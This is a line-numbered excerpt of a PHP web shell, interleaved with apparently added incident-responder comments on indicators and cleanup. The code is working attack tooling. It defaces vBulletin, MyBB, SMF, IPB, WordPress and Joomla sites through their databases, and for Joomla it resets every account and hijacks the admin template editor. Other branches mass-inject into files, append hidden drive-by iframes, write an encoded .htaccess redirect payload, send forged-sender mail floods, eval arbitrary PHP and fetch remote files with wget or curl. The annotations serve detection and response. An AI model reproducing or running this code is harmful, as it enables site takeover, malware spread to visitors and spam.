1914 echo "<font class=txt>Password Changed Successfully</font>";
1915 }
1916 else
1917 echo "Cannot Change Password";
1918 }
1919}
// Content tampering through the database. With operator-supplied database
// credentials (f1..f4) this branch rewrites template or content tables of the
// selected forum/CMS; POST values are interpolated into the SQL unchanged.
// Indicators for responders:
//  - vBulletin/MyBB: every row of the template table is replaced (no WHERE
//    clause) by a string that starts with an eval(base64_decode(...)) template
//    expression;
//  - SMF/IPB/WordPress: board, forum or post titles and bodies replaced, for
//    WordPress optionally on every row;
//  - Joomla: every row of the users table set to one fixed login and hash, then
//    the active template's index.php rewritten through the site's own admin
//    interface.
// Response: restore the affected tables and template files from backup, reset
// all accounts, rotate the database credentials.
1920else if(isset($_POST['forumdeface']))
1921{
1922 $localhost = $_POST['f1'];
1923 $database = $_POST['f2'];
1924 $username = $_POST['f3'];
1925 $password = $_POST['f4'];
1926 $index = $_POST['index'];
1927 $prefix = $_POST['tableprefix'];
1928
1929 if($_POST['forumdeface'] == "vb")
1930 {
1931 $con =@ mysql_connect($localhost,$username,$password);
1932 $db =@ mysql_select_db($database,$con);
1933 $index=str_replace('"','\\"',$index);
1934 $attack = "{\${eval(base64_decode(\'";
1935 $attack .= base64_encode("echo \"$index\";");
1936 $attack .= "\'))}}{\${exit()}}</textarea>";
1937 if($prefix == "" || $prefix == null)
1938 $query = "UPDATE template SET template = '$attack'";
1939 else
1940 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1941 $result =@ mysql_query($query,$con);
1942 if($result)
1943 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1944 else
1945 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1946 }
1947 else if($_POST['forumdeface'] == "mybb")
1948 {
1949 $con =@ mysql_connect($localhost,$username,$password);
1950 $db =@ mysql_select_db($database,$con);
1951 $attack = "{\${eval(base64_decode(\'";
1952 $attack .= base64_encode("echo \"$index\";");
1953 $attack .= "\'))}}{\${exit()}}</textarea>";
1954 $attack = str_replace('"',"\\'",$attack);
1955
1956 if($prefix == "" || $prefix == null)
1957 $query = "UPDATE mybb_templates SET template = '$attack'";
1958 else
1959 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1960 $result =@ mysql_query($query,$con);
1961 if($result)
1962 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1963 else
1964 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1965 }
1966 else if($_POST['forumdeface'] == "smf")
1967 {
1968 $head = $_POST['head'];
1969 $catid = $_POST['f5'];
1970
1971 $con =@ mysql_connect($localhost,$username,$password);
1972 $db =@ mysql_select_db($database,$con);
1973 if($prefix == "" || $prefix == null)
1974 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1975 else
1976 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1977 $result =@ mysql_query($query,$con);
1978 if($result)
1979 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1980 else
1981 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1982 }
1983 else if($_POST['forumdeface'] == "ipb")
1984 {
1985 $head = $_POST['head'];
1986 $catid = $_POST['f5'];
1987
1988 $IPB = "forums";
1989 $con =@ mysql_connect($localhost,$username,$password);
1990 $db =@ mysql_select_db($database,$con);
1991 if($prefix == "" || $prefix == null)
1992 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1993 else
1994 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1995 if($result)
1996 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1997 else
1998 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1999 }
2000 else if($_POST['forumdeface'] == "wp")
2001 {
2002 $catid = $_POST['f5'];
2003 $head = $_POST['head'];
2004
2005 $con =@ mysql_connect($localhost,$username,$password);
2006 $db =@ mysql_select_db($database,$con);
2007 if($prefix == "" || $prefix == null)
2008 {
2009 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2010 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2011 else
2012 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2013 }
2014 else
2015 {
2016 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2017 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2018 else
2019 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2020
2021 }
2022 $result =@mysql_query($query,$con) or mysql_error();
2023 if($result)
2024 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2025 else
2026 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2027 }
2028 else if($_POST['forumdeface'] == "joomla")
2029 {
2030 $site_url = $_POST['siteurl'];
2031 $dbprefix = $_POST['tableprefix'];
2032 $dbname = $_POST['f2'];
// $h is the replacement template source: a short PHP snippet that echoes the
// base64-decoded "index" value and exits. A template index.php that consists
// of echo(stripslashes(base64_decode(...))) followed by exit is the on-disk
// indicator.
2033 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2034
// Returns an 8-character string drawn from $chars; rand() % 33 limits the
// index to 0..32. The result is used below as the curl cookie-jar file name,
// so stray 8-character files made of these characters in the shell's working
// directory are a possible artifact.
2035 function randomt()
2036 {
2037 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2038 srand((double)microtime()*1000000);
2039 $i = 0;
2040 $pass = '' ;
2041
2042 while ($i <= 7)
2043 {
2044 $num = rand() % 33;
2045 $tmp = substr($chars, $num, 1);
2046 $pass = $pass . $tmp;
2047 $i++;
2048 }
2049
2050 return $pass;
2051 }
// Returns the trimmed text that follows the $i-th occurrence of
// $marqueurDebutLien in $text, up to the next $marqueurFinLien. Used below to
// pull hidden form fields out of fetched HTML.
2052 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2053 {
2054 $ar0=explode($marqueurDebutLien, $text);
2055 $ar1=explode($marqueurFinLien, $ar0[$i]);
2056 $ar=trim($ar1[0]);
2057 return $ar;
2058 }
2059 $co=randomt();
2060
2061 $link=mysql_connect($localhost,$username,$password) ;
2062 mysql_select_db($dbname,$link);
2063
// No WHERE clause: every row of the users table receives the same username and
// the same fixed hash. A users table in which all accounts share this login
// and hash is a strong tamper indicator.
2064 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2065
// The presence of an "extensions" table selects between two code paths that
// differ in table names and admin URLs (presumably newer vs. older Joomla
// schemas - confirm).
2066 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2067
2068 if ( $req )
2069 {
2070 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2071 $data = mysql_fetch_array($req);
2072 $template_name=$data["template"];
2073
2074 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2075 $data = mysql_fetch_array($req);
2076 $template_id=$data["extension_id"];
2077
// From here the code drives the site's admin interface over HTTP with curl:
// fetch the login form, log in as "admin", open the template editor for
// index.php, and save $h as its source. In web logs this appears as an admin
// login followed by com_templates edit/save requests whose client address is
// the compromised host. $useragent is not set anywhere in this excerpt.
2078 $url2=$site_url."/index.php";
2079
2080 $ch = curl_init();
2081 curl_setopt($ch, CURLOPT_URL, $url2);
2082 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2083 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2084 curl_setopt($ch, CURLOPT_HEADER, 1);
2085 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2086 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2087 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2088
2089
2090 $buffer = curl_exec($ch);
2091
2092 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2093 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2094
2095
2096 $url2=$site_url."/index.php";
2097 $ch = curl_init();
2098 curl_setopt($ch, CURLOPT_URL, $url2);
2099 curl_setopt($ch, CURLOPT_POST, 1);
2100 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2101 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2102 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2103 curl_setopt($ch, CURLOPT_HEADER, 0);
2104 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2105 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2106 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2107 $buffer = curl_exec($ch);
2108
2109 $pos = strpos($buffer,"com_config");
2110 if($pos === false)
2111 {
2112 echo("<br>[-] Login Error");
2113 exit;
2114 }
2115
2116 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2117 $ch = curl_init();
2118 curl_setopt($ch, CURLOPT_URL, $url2);
2119 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2120 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2121 curl_setopt($ch, CURLOPT_HEADER, 0);
2122 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2123 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2124
2125 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2126 $buffer = curl_exec($ch);
2127
2128 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2129 if(!$hidden2)
2130 {
2131 echo("<br>[-] index.php Not found in Theme Editor");
2132 exit;
2133 }
2134
2135 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2136
2137 $ch = curl_init();
2138 curl_setopt($ch, CURLOPT_URL, $url2);
2139 curl_setopt($ch, CURLOPT_POST, 1);
2140 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2141
2142 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2143 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2144 curl_setopt($ch, CURLOPT_HEADER, 0);
2145 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2146 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2147 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2148 $buffer = curl_exec($ch);
2149
2150 $pos = strpos($buffer,'<dd class="message message">');
2151 if($pos === false)
2152 {
2153 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2154 }
2155 else
2156 {
2157 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2158 }
2159 }
2160 else
2161 {
// Second code path, taken when the "extensions" query fails: same sequence
// (fetch form, log in, open template source, save $h) against the
// templates_menu table and the edit_source/save_source tasks.
2162 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2163 $data = mysql_fetch_array($req);
2164 $template_name=$data["template"];
2165
2166 $url2=$site_url."/index.php";
2167 $ch = curl_init();
2168 curl_setopt($ch, CURLOPT_URL, $url2);
2169 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2170 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2171 curl_setopt($ch, CURLOPT_HEADER, 1);
2172 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2173 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2174 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2175 $buffer = curl_exec($ch);
2176
2177 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2178
2179 $url2=$site_url."/index.php";
2180 $ch = curl_init();
2181 curl_setopt($ch, CURLOPT_URL, $url2);
2182 curl_setopt($ch, CURLOPT_POST, 1);
2183 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2184 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2185 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2186 curl_setopt($ch, CURLOPT_HEADER, 0);
2187 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2188 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2189 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2190 $buffer = curl_exec($ch);
2191
2192 $pos = strpos($buffer,"com_config");
2193
2194 if($pos === false)
2195 {
2196 echo("<br>[-] Login Error");
2197 exit;
2198 }
2199
2200 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2201 $ch = curl_init();
2202 curl_setopt($ch, CURLOPT_URL, $url2);
2203 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2204 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2205 curl_setopt($ch, CURLOPT_HEADER, 0);
2206 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2207 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2208 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2209 $buffer = curl_exec($ch);
2210
2211 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2212
2213 if(!$hidden2)
2214 {
2215 echo("<br>[-] index.php Not found in Theme Editor");
2216 }
2217
2218 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2219 $ch = curl_init();
2220 curl_setopt($ch, CURLOPT_URL, $url2);
2221 curl_setopt($ch, CURLOPT_POST, 1);
2222 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2223 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2224 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2225 curl_setopt($ch, CURLOPT_HEADER, 0);
2226 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2227 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2228 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2229 $buffer = curl_exec($ch);
2230
2231 $pos = strpos($buffer,'<dd class="message message fade">');
2232 if($pos === false)
2233 {
2234 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2235 exit;
2236 }
2237 else
2238 {
2239 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2240 }
2241 }
2242 }
2243}
// Bulk file modification. Every file matching <pathtomass>/*.<filetype> is
// opened in append mode (default, or mode "Apender") or truncating write mode
// ("Overwriter"), and the "injectthis" value is written to it; the shell's own
// file is skipped. $directorysperator is defined outside this excerpt.
// Detection: many files of one extension in one directory changing mtime
// within the same second and sharing an identical tail (or identical whole
// content); file-integrity monitoring on the web root catches this directly.
// Recovery: restore from version control or backup rather than hand-editing.
2244else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2245{
2246 $filetype = $_POST['filetype'];
2247
2248 $mode = "a";
2249
2250 if($_POST['mode'] == 'Apender')
2251 $mode = "a";
2252
2253 if($_POST['mode'] == 'Overwriter')
2254 $mode = "w";
2255
2256 if (is_dir($_POST['pathtomass']))
2257 {
2258 $lolinject = $_POST['injectthis'];
2259 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2260 if(substr($_POST['pathtomass'], -1) == "\\")
2261 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2262 foreach (glob($mypath) as $injectj00)
2263 {
2264 if($injectj00 == __FILE__)
2265 continue;
2266 $fp=fopen($injectj00,$mode);
2267 if (fputs($fp,$lolinject))
2268 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2269 else
2270 echo 'failed to inject '.$injectj00.'<br>';
2271 }
2272 }
2273 else
2274 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2275}
// Mail abuse through PHP mail(). "dobombing" sends the same message "times"
// times to one recipient with a forged From address at whitehouse.gov
// (optionally with random padding in From, subject and body); "massmailing"
// sends one message with a caller-supplied From. Recipient, subject, body and
// From come straight from POST and are placed into mail() unchanged.
// Detection: spikes of outbound mail submitted by the web-server user, From
// domains the host is not authorised for, MTA queue growth. Mitigation: rate
// limits on local submission, and disabling mail() where the site does not
// need it.
2276else if(isset($_POST['mailfunction']))
2277{
2278 if($_POST['mailfunction'] == "dobombing")
2279 {
2280 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2281 {
2282 $times = $_POST['times'];
2283 while($times--)
2284 {
2285 if(isset($_POST['padding']))
2286 {
2287 $fromPadd = rand(0,9999);
2288 $subjectPadd = " -- ID : ".rand(0,9999999);
2289 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2290
2291 }
2292 $from = "president$fromPadd@whitehouse.gov";
2293 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2294 {
2295 $error = 1;
2296 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2297 break;
2298 }
2299 }
2300 if($error != 1)
2301 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2302 }
2303 }
2304 else if($_POST['mailfunction'] == "massmailing")
2305 {
2306 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2307 {
2308 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2309 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2310 else
2311 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2312 }
2313 }
2314}
// Arbitrary PHP execution. The POST field "code" has PHP open/close tags
// stripped and is passed to eval(); "intext" only selects whether the output
// is framed in a textarea or in a font element.
// NOTE(review): eval() on request data. eval is a language construct, so the
// disable_functions ini setting does not block it; detection has to come from
// file-integrity monitoring, static scanning for eval applied to request
// variables, and logging of POST requests that carry "code" and "intext".
2315else if(isset($_POST['code']))
2316{
2317 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2318 {
2319 // FIlter Some Chars we dont need
2320 ?><br>
2321 <textarea name="code" class="box" cols="120" rows="10"><?php
2322 $code = str_replace("<?php","",$_POST['code']);
2323 $code = str_replace("<?","",$code);
2324 $code = str_replace("?>","",$code);
2325
2326 // Evaluate PHP CoDE!
2327 htmlspecialchars(eval($code));
2328 ?>
2329 </textarea><?php
2330 }
2331 else if($_POST['code'] != null && $_POST['intext'] == "false")
2332 {
2333 $code = str_replace("<?php","",$_POST['code']);
2334 $code = str_replace("<?","",$code);
2335 $code = str_replace("?>","",$code);
2336
2337 // Evaluate PHP CoDE!
2338 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2339 }
2340}
// Drive-by injection. Appends one constant string - a zero-size iframe whose
// src is $malsite (set near the top of the file) - to .php, .htm and .html
// files found under the "path" request value. Files are opened in append mode,
// so the marker sits at the very end of each file, after the original content.
// Detection: search the web root for files ending in the literal iframe tag
// built below (width=0px height=0px frameborder=no name=frame1); because the
// string is constant it is a reliable signature. Cleanup: restore from backup
// or strip the exact trailing string, then find and remove the shell itself.
2341else if(isset($_GET['infect']))
2342{
2343 $coun = 0;
2344 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2345 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2346 {
2347 if($injectj00 == __FILE__)
2348 continue;
2349 if($myfile=fopen($injectj00,'a'))
2350 {
2351 fputs($myfile, $str);
2352 fclose($myfile);
2353 $coun = 1;
2354 }
2355 }
2356 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2357 {
2358 if($myfile=fopen($injectj00,'a'))
2359 {
2360 fputs($myfile, $str);
2361 fclose($myfile);
2362 $coun = 1;
2363 }
2364 }
2365 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2366 {
2367 if($myfile=fopen($injectj00,'a'))
2368 {
2369 fputs($myfile, $str);
2370 fclose($myfile);
2371 $coun = 1;
2372 }
2373 }
2374
2375
2376 if($coun == 1)
2377 echo "<center>Done !!!!<center>";
2378 else
2379 echo "<center>Cannot open files !!!!<center>";
2380}
// Appends an embedded payload to the .htaccess in the current directory. The
// payload is stored base64-encoded and zlib-compressed in $mal and is written
// after gzuncompress(base64_decode(...)), followed by "\n\r". Its decoded
// content is not visible here; the shell's own menu labels this action
// "Redirect Search Engine TO Malwared site", so it is presumably a set of
// rewrite rules - decode it offline in an isolated environment to confirm.
// Detection: unexpected growth of .htaccess, rules appended after the site's
// own, and a stray "\n\r" line ending. Where the application allows it,
// AllowOverride None removes this persistence point.
2381else if(isset($_GET['redirect']))
2382{
2383 if($myfile = fopen(".htaccess",'a'))
2384 {
2385 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2386 fwrite($myfile, gzuncompress(base64_decode($mal)));
2387 fwrite($myfile, "\n\r");
2388 fclose($myfile);
2389 echo "<center>Done !!!!<center>";
2390 }
2391 else
2392 echo "<center>Cannot open file !!!!<center>";
2393}
// Menu for the two actions above: renders links that call the page's
// malwarefun() script (defined outside this excerpt) with 'infect' or
// 'redirect'. The "dir" request value is echoed into the hidden field without
// escaping. Requests carrying "malware", "infect" or "redirect" parameters to
// an unexpected PHP file are a log-side indicator.
2394else if(isset($_GET['malware']))
2395{ ?>
2396 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2397 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2398 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2399 <div id="showmal"></div>
2400 <?php
2401}
// .htaccess viewer/editor front end: reads the .htaccess in the current
// directory and prints it, unescaped, into a textarea whose button calls the
// page's codeinsert() script (defined outside this excerpt). Together with the
// "getcode" handler this gives the operator write access to per-directory
// server configuration.
2402else if(isset($_GET['codeinsert']))
2403{
2404 if($file1 = fopen(".htaccess",'r'))
2405 {
2406 ?><div id="showcode"></div>
2407 <form method=post>
2408 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2409 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2410 </form>
2411 <?php }
2412 else
2413 echo "<center>Cannot Open File!!</center>";
2414}
// Appends the raw POST value "getcode" to the .htaccess in the current
// directory, followed by "\n\r". Any directive the server's AllowOverride
// setting permits can be added this way, so .htaccess files belong under
// file-integrity monitoring and AllowOverride should be as narrow as the
// application tolerates.
2415else if(isset($_POST['getcode']))
2416{
2417 if($myfile = fopen(".htaccess",'a'))
2418 {
2419 fwrite($myfile, $_POST['getcode']);
2420 fwrite($myfile, "\n\r");
2421 fclose($myfile);
2422 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2423 }
2424 else
2425 echo "Permission Denied";
2426}
// Remote file retrieval. "functiontype" selects a command-line download tool,
// "wurl" is the source URL and "path" the directory later checked for the
// result. magicboom(), which() and execmd() are defined outside this excerpt.
// The URL is concatenated into the command string without quoting.
// Detection: the web server or PHP process spawning wget, lynx, fetch, links,
// GET or curl (process-execution telemetry with the parent process recorded),
// and new files appearing in web-writable directories. Mitigation: egress
// filtering for the web tier and disabling PHP's command-execution functions
// where the application does not need them.
2427else if(isset($_GET['uploadurl']))
2428{
2429 $functiontype = trim($_GET['functiontype']);
2430 $wurl = trim($_GET['wurl']);
2431 $path = magicboom($_GET['path']);
2432
// Builds and runs the download command for the chosen tool and returns the
// local file name, which is basename($url).
2433 function remotedownload($cmd,$url)
2434 {
2435 $namafile = basename($url);
2436 switch($cmd)
2437 {
2438 case 'wwget':
2439 execmd(which('wget')." ".$url." -O ".$namafile);
2440 break;
2441 case 'wlynx':
2442 execmd(which('lynx')." -source ".$url." > ".$namafile);
2443 break;
2444 case 'wfread' :
2445 execmd($wurl,$namafile);
2446 break;
2447 case 'wfetch' :
2448 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2449 break;
2450 case 'wlinks' :
2451 execmd(which('links')." -source ".$url." > ".$namafile);
2452 break;
2453 case 'wget' :
2454 execmd(which('GET')." ".$url." > ".$namafile);
2455 break;
2456 case 'wcurl' :
2457 execmd(which('curl')." ".$url." -o ".$namafile);
2458 break;
2459 default:
2460 break;
2461 }
2462 return $namafile;
2463 }
2464 $namafile = remotedownload($functiontype,$wurl);
2465 $fullpath = $path . $directorysperator . $namafile;
2466 if(is_file($fullpath))
2467 {
2468 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2469 }
2470 else
2471 echo "<center>Failed to upload $namafile</center>";
2472}
// Creates a directory at the path given in the "createfolder" request value,
// with mkdir()'s default mode. New directories owned by the web-server user in
// places the application never writes to are worth reviewing.
2473else if(isset($_GET['createfolder']))
2474{
2475 if(!mkdir($_GET['createfolder']))
2476 echo "Failed To create";
2477 else
2478 echo "<font class=txt>Folder Created Successfully</font>";
2479}
// Self-removal: deletes this script from disk. For responders this means a
// missing file is not evidence of a clean host; the request that triggered it
// (a "selfkill" parameter) may still be in access logs, and files or
// configuration changed by the other branches remain in place.
2480else if(isset($_GET['selfkill']))
2481{
2482 if(unlink(__FILE__))
2483 echo "<br><center><font size=5>Good Bye......</font></center>";
2484 else
2485 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2486}
// Front end for the file writer: renders a form that hands a target file name
// (the "Create" request value, echoed into the hidden field without escaping)
// and a content textarea to the page's createfile() script, which is defined
// outside this excerpt.
2487else if(isset($_GET['Create']))
2488{
2489 ?>
2490 <form method="post">
2491 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2492 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2493 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2494 </form>
2495
2496<?php }
// Arbitrary file write: opens the path in "filecreator" with mode "w+" (which
// truncates an existing file) and writes "filecontent" to it. Both values come
// from POST unchanged, so any location writable by the web-server user can be
// created or overwritten. Detection: new or modified files owned by the
// web-server user outside the application's upload and cache directories;
// mitigation: a read-only web root with writes confined to directories where
// script execution is disabled.
2497else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2498{
2499 $content = $_POST['filecontent'];
2500 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2501 {
2502 fwrite($file_pointer, $content);
2503 fclose($file_pointer);
2504 echo "<font class=txt>File Created Successfully</font>";
2505 }
2506 else
2507 echo "Cannot Create File";
2508}
2509else if(isset($_REQUEST["defaceforum"]))
2510{
2511 ?>
2512 <center><div id="showdeface"></div>
2513 <font color="#FF0000" size="4">Forum Index Changer</font>
2514 <form action="<?php echo $self; ?>" method = "POST">
2515 <input type="hidden" name="forum">
2516 <input type="hidden" name="defaceforum">
2517 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2518 <tr>
2519 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2520
2521 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2522 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2523 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2524
2525 <tr><td height="50" width="50%">Type :
2526 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2527 <option value="vb">vbulletin</option>
2528 <option value="mybb">Mybb</option>
2529 <option value="smf">SMF</option>
2530 <option value="ipb">IPB</option>
2531 <option value="wp">Wordpress</option>
2532 <option value="joomla">Joomla</option>
2533 </select></td>
2534 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2535
2536 </tr>
2537 <tr>
2538 <td height="167" width="50%" colspan=2>
2539 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2540
2541 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2542 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2543 </div>
2544
2545 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
